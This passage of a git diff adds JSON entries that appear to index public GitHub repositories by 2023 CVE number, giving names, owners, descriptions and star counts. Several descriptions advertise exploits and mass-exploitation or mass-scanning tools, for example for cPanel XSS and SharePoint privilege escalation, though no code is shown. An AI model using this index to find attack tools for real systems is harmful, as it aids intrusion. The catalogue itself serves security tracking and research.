93457304, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/93457304?v=4", + "html_url": "https:\/\/github.com\/ohnonoyesyes", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ohnonoyesyes\/CVE-2023-29084", + "description": "Command injection in ManageEngine ADManager Plus", + "fork": false, + "created_at": "2023-04-17T01:32:29Z", + "updated_at": "2024-06-17T10:34:08Z", + "pushed_at": "2023-04-17T01:33:11Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-2916.json b/2023/CVE-2023-2916.json new file mode 100644 index 0000000000..1c77457d32 --- /dev/null +++ b/2023/CVE-2023-2916.json @@ -0,0 +1,33 @@ +[ + { + "id": 678836726, + "name": "CVE-2023-2916", + "full_name": "d0rb\/CVE-2023-2916", + "owner": { + "login": "d0rb", + "id": 10403781, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10403781?v=4", + "html_url": "https:\/\/github.com\/d0rb", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/d0rb\/CVE-2023-2916", + "description": "CVE-2023-2916 PoC", + "fork": false, + "created_at": "2023-08-15T13:51:38Z", + "updated_at": "2023-08-15T13:53:04Z", + "pushed_at": "2023-08-15T13:53:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-2928.json b/2023/CVE-2023-2928.json new file mode 100644 index 0000000000..ba463bf290 --- /dev/null +++ b/2023/CVE-2023-2928.json @@ -0,0 +1,33 @@ +[ + { + "id": 702913218, + "name": "DedeCMS-getshell-CVE-2023-2928-", + "full_name": "CN016\/DedeCMS-getshell-CVE-2023-2928-", + "owner": { + "login": "CN016", + "id": 108575004, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108575004?v=4", + "html_url": "https:\/\/github.com\/CN016", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CN016\/DedeCMS-getshell-CVE-2023-2928-", + "description": "DedeCMS文件包含漏洞导致后台getshell(CVE-2023-2928)复现", + "fork": false, + "created_at": "2023-10-10T08:46:17Z", + "updated_at": "2024-11-12T09:02:45Z", + "pushed_at": "2023-10-10T08:46:50Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-29324.json b/2023/CVE-2023-29324.json new file mode 100644 index 0000000000..8820cad3e6 --- /dev/null +++ b/2023/CVE-2023-29324.json @@ -0,0 +1,33 @@ +[ + { + "id": 640349187, + "name": "CVE-2023-29324_Patch_Deploy", + "full_name": "OLeDouxEt\/CVE-2023-29324_Patch_Deploy", + "owner": { + "login": "OLeDouxEt", + "id": 111026713, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/111026713?v=4", + "html_url": "https:\/\/github.com\/OLeDouxEt", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/OLeDouxEt\/CVE-2023-29324_Patch_Deploy", + "description": null, + "fork": false, + "created_at": "2023-05-13T19:40:43Z", + "updated_at": "2024-08-10T17:51:58Z", + "pushed_at": "2023-05-13T21:56:10Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-29336.json b/2023/CVE-2023-29336.json new file mode 100644 index 0000000000..7088448079 --- /dev/null +++ b/2023/CVE-2023-29336.json @@ -0,0 +1,33 @@ +[ + { + "id": 651595530, + "name": "CVE-2023-29336", + "full_name": "m-cetin\/CVE-2023-29336", + "owner": { + "login": "m-cetin", + "id": 102237861, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102237861?v=4", + "html_url": "https:\/\/github.com\/m-cetin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/m-cetin\/CVE-2023-29336", + "description": null, + "fork": false, + "created_at": "2023-06-09T15:36:45Z", + "updated_at": "2024-08-04T18:38:08Z", + "pushed_at": "2023-06-09T15:41:53Z", + "stargazers_count": 16, + "watchers_count": 16, + "has_discussions": false, + "forks_count": 13, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 13, + "watchers": 16, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-29343.json b/2023/CVE-2023-29343.json new file mode 100644 index 0000000000..0c0c6dc931 --- /dev/null +++ b/2023/CVE-2023-29343.json @@ -0,0 +1,33 @@ +[ + { + "id": 655256964, + "name": "CVE-2023-29343", + "full_name": "Wh04m1001\/CVE-2023-29343", + "owner": { + "login": "Wh04m1001", + "id": 44291883, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44291883?v=4", + "html_url": "https:\/\/github.com\/Wh04m1001", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Wh04m1001\/CVE-2023-29343", + "description": null, + "fork": false, + "created_at": "2023-06-18T11:14:08Z", + "updated_at": "2024-11-15T16:29:04Z", + "pushed_at": "2023-06-18T11:51:54Z", + "stargazers_count": 160, + "watchers_count": 160, + "has_discussions": false, + "forks_count": 26, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 26, + "watchers": 160, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-29357.json b/2023/CVE-2023-29357.json new file mode 100644 index 0000000000..b65fa0971e --- /dev/null +++ b/2023/CVE-2023-29357.json @@ -0,0 +1,195 @@ +[ + { + "id": 696891493, + "name": "CVE-2023-29357", + "full_name": "Chocapikk\/CVE-2023-29357", + "owner": { + "login": "Chocapikk", + "id": 88535377, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4", + "html_url": "https:\/\/github.com\/Chocapikk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2023-29357", + "description": "Microsoft SharePoint Server Elevation of Privilege Vulnerability", + "fork": false, + "created_at": "2023-09-26T16:18:41Z", + "updated_at": "2024-11-15T02:15:33Z", + "pushed_at": "2023-09-26T19:04:21Z", + "stargazers_count": 228, + "watchers_count": 228, + "has_discussions": false, + "forks_count": 31, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-24955", + "cve-2023-29357", + "exploit", + "infosec", + "microsoft", + "sharepoint" + ], + "visibility": "public", + "forks": 31, + "watchers": 228, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 698771899, + "name": "CVE-2023-29357", + "full_name": "LuemmelSec\/CVE-2023-29357", + "owner": { + "login": "LuemmelSec", + "id": 58529760, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58529760?v=4", + "html_url": "https:\/\/github.com\/LuemmelSec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LuemmelSec\/CVE-2023-29357", + "description": null, + "fork": false, + "created_at": "2023-09-30T23:17:04Z", + "updated_at": "2024-10-17T20:14:09Z", + "pushed_at": "2023-10-10T19:00:30Z", + "stargazers_count": 51, + "watchers_count": 51, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 51, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 703043275, + "name": "CVE-2023-29357-ExE", + "full_name": "KeyStrOke95\/CVE-2023-29357-ExE", + "owner": { + "login": "KeyStrOke95", + "id": 12446252, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12446252?v=4", + "html_url": "https:\/\/github.com\/KeyStrOke95", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/KeyStrOke95\/CVE-2023-29357-ExE", + "description": "Recreation of the SharePoint PoC for CVE-2023-29357 in C# from LuemmelSec", + "fork": false, + "created_at": "2023-10-10T13:41:21Z", + "updated_at": "2024-02-17T23:21:40Z", + "pushed_at": "2023-10-10T13:44:08Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 734652064, + "name": "cve-2023-29357-Sharepoint", + "full_name": "Guillaume-Risch\/cve-2023-29357-Sharepoint", + "owner": { + "login": "Guillaume-Risch", + "id": 60431931, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60431931?v=4", + "html_url": "https:\/\/github.com\/Guillaume-Risch", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Guillaume-Risch\/cve-2023-29357-Sharepoint", + "description": null, + "fork": false, + "created_at": "2023-12-22T08:42:00Z", + "updated_at": "2024-07-04T11:00:31Z", + "pushed_at": "2023-12-22T08:49:59Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 737886117, + "name": "CVE-2023-29357-Check", + "full_name": "Jev1337\/CVE-2023-29357-Check", + "owner": { + "login": "Jev1337", + "id": 19759761, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19759761?v=4", + "html_url": "https:\/\/github.com\/Jev1337", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Jev1337\/CVE-2023-29357-Check", + "description": "A Python script that verifies whether a target is vulnerable to CVE-2023-29357 or not", + "fork": false, + "created_at": "2024-01-01T21:08:22Z", + "updated_at": "2024-11-06T09:07:45Z", + "pushed_at": "2024-01-01T21:13:58Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 856513093, + "name": "Event-ID-189-Rule-Name-SOC227-CVE-2023-29357", + "full_name": "AhmedMansour93\/Event-ID-189-Rule-Name-SOC227-CVE-2023-29357", + "owner": { + "login": "AhmedMansour93", + "id": 179945455, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/179945455?v=4", + "html_url": "https:\/\/github.com\/AhmedMansour93", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AhmedMansour93\/Event-ID-189-Rule-Name-SOC227-CVE-2023-29357", + "description": "Event ID 189 Rule Name SOC227 Microsoft SharePoint Server Elevation of Privilege Possible CVE-2023-29357 .. Exploitation", + "fork": false, + "created_at": "2024-09-12T17:45:25Z", + "updated_at": "2024-09-12T17:45:57Z", + "pushed_at": "2024-09-12T17:45:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-29360.json b/2023/CVE-2023-29360.json new file mode 100644 index 0000000000..3294f385dd --- /dev/null +++ b/2023/CVE-2023-29360.json @@ -0,0 +1,64 @@ +[ + { + "id": 696013086, + "name": "cve-2023-29360", + "full_name": "Nero22k\/cve-2023-29360", + "owner": { + "login": "Nero22k", + "id": 64486541, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64486541?v=4", + "html_url": "https:\/\/github.com\/Nero22k", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Nero22k\/cve-2023-29360", + "description": "Exploit for CVE-2023-29360 targeting MSKSSRV.SYS driver", + "fork": false, + "created_at": "2023-09-24T21:59:23Z", + "updated_at": "2024-11-20T13:36:51Z", + "pushed_at": "2023-10-12T19:18:32Z", + "stargazers_count": 144, + "watchers_count": 144, + "has_discussions": false, + "forks_count": 38, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 38, + "watchers": 144, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 850466517, + "name": "CVE-2023-29360", + "full_name": "0xDivyanshu-new\/CVE-2023-29360", + "owner": { + "login": "0xDivyanshu-new", + "id": 135882723, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/135882723?v=4", + "html_url": "https:\/\/github.com\/0xDivyanshu-new", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xDivyanshu-new\/CVE-2023-29360", + "description": "POC for CVE-2023-29360", + "fork": false, + "created_at": "2024-08-31T21:08:39Z", + "updated_at": "2024-11-14T07:27:55Z", + "pushed_at": "2024-08-31T21:11:39Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 11, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-29384.json b/2023/CVE-2023-29384.json new file mode 100644 index 0000000000..a47a64866b --- /dev/null +++ b/2023/CVE-2023-29384.json @@ -0,0 +1,33 @@ +[ + { + "id": 845081346, + "name": "CVE-2023-29384", + "full_name": "nastar-id\/CVE-2023-29384", + "owner": { + "login": "nastar-id", + "id": 57721604, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57721604?v=4", + "html_url": "https:\/\/github.com\/nastar-id", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nastar-id\/CVE-2023-29384", + "description": "CVE-2023-29384 Auto Exploiter on WordPress Job Board and Recruitment Plugin", + "fork": false, + "created_at": "2024-08-20T14:43:33Z", + "updated_at": "2024-08-21T02:05:28Z", + "pushed_at": "2024-08-21T02:05:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-29406.json b/2023/CVE-2023-29406.json new file mode 100644 index 0000000000..db6ddf456e --- /dev/null +++ b/2023/CVE-2023-29406.json @@ -0,0 +1,33 @@ +[ + { + "id": 717490918, + "name": "EP3_Redes", + "full_name": "LuizGustavoP\/EP3_Redes", + "owner": { + "login": "LuizGustavoP", + "id": 62386766, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62386766?v=4", + "html_url": "https:\/\/github.com\/LuizGustavoP", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LuizGustavoP\/EP3_Redes", + "description": "Implementações de servidores HTML em GO para análise da vulnerabilidade CVE-2023-29406.", + "fork": false, + "created_at": "2023-11-11T16:28:22Z", + "updated_at": "2023-11-11T16:28:22Z", + "pushed_at": "2023-11-11T16:28:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-29409.json b/2023/CVE-2023-29409.json new file mode 100644 index 0000000000..19d0e1be94 --- /dev/null +++ b/2023/CVE-2023-29409.json @@ -0,0 +1,33 @@ +[ + { + "id": 681256401, + "name": "CVE-2023-29409", + "full_name": "mateusz834\/CVE-2023-29409", + "owner": { + "login": "mateusz834", + "id": 19653795, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19653795?v=4", + "html_url": "https:\/\/github.com\/mateusz834", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mateusz834\/CVE-2023-29409", + "description": " CVE-2023-29409 reproducer", + "fork": false, + "created_at": "2023-08-21T15:59:26Z", + "updated_at": "2024-08-12T20:32:33Z", + "pushed_at": "2023-08-21T16:03:02Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-29439.json b/2023/CVE-2023-29439.json new file mode 100644 index 0000000000..a89a0955fd --- /dev/null +++ b/2023/CVE-2023-29439.json @@ -0,0 +1,33 @@ +[ + { + "id": 662588518, + "name": "CVE-2023-29439", + "full_name": "LOURC0D3\/CVE-2023-29439", + "owner": { + "login": "LOURC0D3", + "id": 83567597, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83567597?v=4", + "html_url": "https:\/\/github.com\/LOURC0D3", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LOURC0D3\/CVE-2023-29439", + "description": "PoC of CVE-2023-29439", + "fork": false, + "created_at": "2023-07-05T13:04:39Z", + "updated_at": "2023-08-06T14:54:28Z", + "pushed_at": "2023-07-05T13:06:37Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-29478.json b/2023/CVE-2023-29478.json new file mode 100644 index 0000000000..232da569b2 --- /dev/null +++ b/2023/CVE-2023-29478.json @@ -0,0 +1,33 @@ +[ + { + "id": 558229768, + "name": "BiblioRCE", + "full_name": "Exopteron\/BiblioRCE", + "owner": { + "login": "Exopteron", + "id": 52125609, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52125609?v=4", + "html_url": "https:\/\/github.com\/Exopteron", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Exopteron\/BiblioRCE", + "description": "CVE-2023-29478 - BiblioCraft File Manipulation\/Remote Code Execution exploit affecting BiblioCraft versions prior to v2.4.6", + "fork": false, + "created_at": "2022-10-27T06:17:24Z", + "updated_at": "2024-08-04T01:00:19Z", + "pushed_at": "2024-03-13T01:56:41Z", + "stargazers_count": 14, + "watchers_count": 14, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 14, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-29489.json b/2023/CVE-2023-29489.json new file mode 100644 index 0000000000..721965c388 --- /dev/null +++ b/2023/CVE-2023-29489.json @@ -0,0 +1,612 @@ +[ + { + "id": 633223830, + "name": "CVE-2023-29489", + "full_name": "learnerboy88\/CVE-2023-29489", + "owner": { + "login": "learnerboy88", + "id": 99548826, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99548826?v=4", + "html_url": "https:\/\/github.com\/learnerboy88", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/learnerboy88\/CVE-2023-29489", + "description": "Nuclei template for CVE-2023-29489", + "fork": false, + "created_at": "2023-04-27T03:30:24Z", + "updated_at": "2023-04-27T03:30:24Z", + "pushed_at": "2023-04-27T03:32:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 633587053, + "name": "cPanel-CVE-2023-29489", + "full_name": "xKore123\/cPanel-CVE-2023-29489", + "owner": { + "login": "xKore123", + "id": 63617858, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63617858?v=4", + "html_url": "https:\/\/github.com\/xKore123", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xKore123\/cPanel-CVE-2023-29489", + "description": null, + "fork": false, + "created_at": "2023-04-27T20:51:47Z", + "updated_at": "2024-04-12T17:47:40Z", + "pushed_at": "2023-04-27T21:17:52Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 633952269, + "name": "CVE-2023-29489.py", + "full_name": "ipk1\/CVE-2023-29489.py", + "owner": { + "login": "ipk1", + "id": 32953048, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32953048?v=4", + "html_url": "https:\/\/github.com\/ipk1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ipk1\/CVE-2023-29489.py", + "description": "a pyhton script to test all results from shodan for cPanel CVE-2023-29489, credits to @assetnote, I just automate", + "fork": false, + "created_at": "2023-04-28T16:56:36Z", + "updated_at": "2023-07-12T02:27:49Z", + "pushed_at": "2023-04-28T17:02:46Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 634124004, + "name": "CVE-2023-29489.yaml", + "full_name": "Mostafa-Elguerdawi\/CVE-2023-29489.yaml", + "owner": { + "login": "Mostafa-Elguerdawi", + "id": 61470364, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61470364?v=4", + "html_url": "https:\/\/github.com\/Mostafa-Elguerdawi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Mostafa-Elguerdawi\/CVE-2023-29489.yaml", + "description": null, + "fork": false, + "created_at": "2023-04-29T05:52:53Z", + "updated_at": "2023-04-29T05:52:54Z", + "pushed_at": "2023-04-29T05:52:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 634124302, + "name": "CVE-2023-29489", + "full_name": "Mostafa-Elguerdawi\/CVE-2023-29489", + "owner": { + "login": "Mostafa-Elguerdawi", + "id": 61470364, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61470364?v=4", + "html_url": "https:\/\/github.com\/Mostafa-Elguerdawi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Mostafa-Elguerdawi\/CVE-2023-29489", + "description": null, + "fork": false, + "created_at": "2023-04-29T05:54:19Z", + "updated_at": "2023-04-29T05:54:20Z", + "pushed_at": "2023-04-29T05:55:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 634734009, + "name": "EagleEye", + "full_name": "whalebone7\/EagleEye", + "owner": { + "login": "whalebone7", + "id": 125891350, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/125891350?v=4", + "html_url": "https:\/\/github.com\/whalebone7", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/whalebone7\/EagleEye", + "description": "To filter the actual vulnerable URLs from the screenshots, you can use the ee.sh script. Simply run .\/ee.sh -f \"path\/to\/index_screenshot.txt\" -k \"hacked\" and the script will filter the URLs that contain the reflective XSS payload (For Example: cPanel CVE-2023-29489 ) in their screenshots.", + "fork": false, + "created_at": "2023-05-01T03:29:11Z", + "updated_at": "2023-06-26T15:36:40Z", + "pushed_at": "2023-05-01T03:44:47Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 642105586, + "name": "CVE-2023-29489", + "full_name": "0-d3y\/CVE-2023-29489", + "owner": { + "login": "0-d3y", + "id": 103077384, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/103077384?v=4", + "html_url": "https:\/\/github.com\/0-d3y", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0-d3y\/CVE-2023-29489", + "description": "Mass Scaning vulnerability in Cpanel [XSS] ", + "fork": false, + "created_at": "2023-05-17T20:46:59Z", + "updated_at": "2024-11-19T12:09:30Z", + "pushed_at": "2024-08-25T00:34:47Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 12, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 648330999, + "name": "CVE-2023-29489", + "full_name": "Abdullah7-ma\/CVE-2023-29489", + "owner": { + "login": "Abdullah7-ma", + "id": 71210670, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71210670?v=4", + "html_url": "https:\/\/github.com\/Abdullah7-ma", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Abdullah7-ma\/CVE-2023-29489", + "description": "CVE-2023-29489-XSS", + "fork": false, + "created_at": "2023-06-01T18:13:17Z", + "updated_at": "2024-07-10T13:47:36Z", + "pushed_at": "2024-07-10T13:47:33Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 652041402, + "name": "CVE-2023-29489", + "full_name": "tucommenceapousser\/CVE-2023-29489", + "owner": { + "login": "tucommenceapousser", + "id": 129875733, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/129875733?v=4", + "html_url": "https:\/\/github.com\/tucommenceapousser", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tucommenceapousser\/CVE-2023-29489", + "description": null, + "fork": false, + "created_at": "2023-06-10T22:34:59Z", + "updated_at": "2023-06-10T22:35:14Z", + "pushed_at": "2023-06-10T22:35:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 652043509, + "name": "CVE-2023-29489.py", + "full_name": "tucommenceapousser\/CVE-2023-29489.py", + "owner": { + "login": "tucommenceapousser", + "id": 129875733, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/129875733?v=4", + "html_url": "https:\/\/github.com\/tucommenceapousser", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tucommenceapousser\/CVE-2023-29489.py", + "description": null, + "fork": false, + "created_at": "2023-06-10T22:48:54Z", + "updated_at": "2023-06-10T22:49:09Z", + "pushed_at": "2023-06-10T22:49:05Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 674826920, + "name": "cpanel-xss-177", + "full_name": "ViperM4sk\/cpanel-xss-177", + "owner": { + "login": "ViperM4sk", + "id": 141459387, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/141459387?v=4", + "html_url": "https:\/\/github.com\/ViperM4sk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ViperM4sk\/cpanel-xss-177", + "description": "Mass Exploitation For (CVE-2023-29489)", + "fork": false, + "created_at": "2023-08-04T22:21:57Z", + "updated_at": "2023-08-04T23:05:52Z", + "pushed_at": "2023-08-05T01:31:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 706134149, + "name": "CVE-2023-29489", + "full_name": "S4muraiMelayu1337\/CVE-2023-29489", + "owner": { + "login": "S4muraiMelayu1337", + "id": 130330296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/130330296?v=4", + "html_url": "https:\/\/github.com\/S4muraiMelayu1337", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/S4muraiMelayu1337\/CVE-2023-29489", + "description": null, + "fork": false, + "created_at": "2023-10-17T11:18:53Z", + "updated_at": "2023-10-17T11:21:12Z", + "pushed_at": "2023-10-17T11:23:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 719748102, + "name": 